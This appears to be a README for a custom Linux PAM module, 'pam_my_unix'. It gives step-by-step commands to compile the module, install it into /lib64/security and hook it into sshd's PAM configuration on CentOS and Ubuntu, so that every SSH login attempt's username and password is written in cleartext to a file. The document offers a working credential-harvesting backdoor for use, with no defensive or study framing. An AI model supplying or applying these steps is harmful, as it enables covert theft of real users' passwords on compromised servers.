Awesome

PAM_MY_UNIX

How to use

• Dependency resolution

  CentOS

  yum intall pam-devel
  

  Ubuntu

  apt-get intall libpam-dev
  

• check password file path This module will put username/password to /home/password.txt, you can change it in main.c. Just edit const char *log_filename = "/home/password.txt"; and compile this PAM module.

• compile

  cc main.c -o pam_my_unix.so -fPIC -m64 -shared -lpam
  

• move to the right directory

  cp ./pam_my_unix.so /lib64/security/
  

• edit sshd's pam config.

  CentOS

  vim /etc/pam.d/sshd
  

  And add the next line after the latest auth interface module:

  auth optional pam_my_unix.so
  

  Maybe you file looks like this after you edit it.

  ...
  auth       required     pam_unix.so nullok
  auth       optional     pam_my_unix.so
  account    required     pam_nologin.so
  account    include      password-auth
  ...
  

  Ubuntu

  cp /etc/pam.d/common-auth /etc/pam.d/sshd-auth
  vim /etc/pam.d/sshd-auth
  

  And the sshd-auth file looks like this below:

  auth	required            pam_unix.so nullok_secure
  auth    optional            pam_my_unix.so
  auth	required			pam_permit.so
  

  And then edit /etc/pam.d/sshd and change

  @include common-auth
  

  to

  @include sshd-auth
  

• result When someone who is trying to auth via ssh, his username and password will log into a file.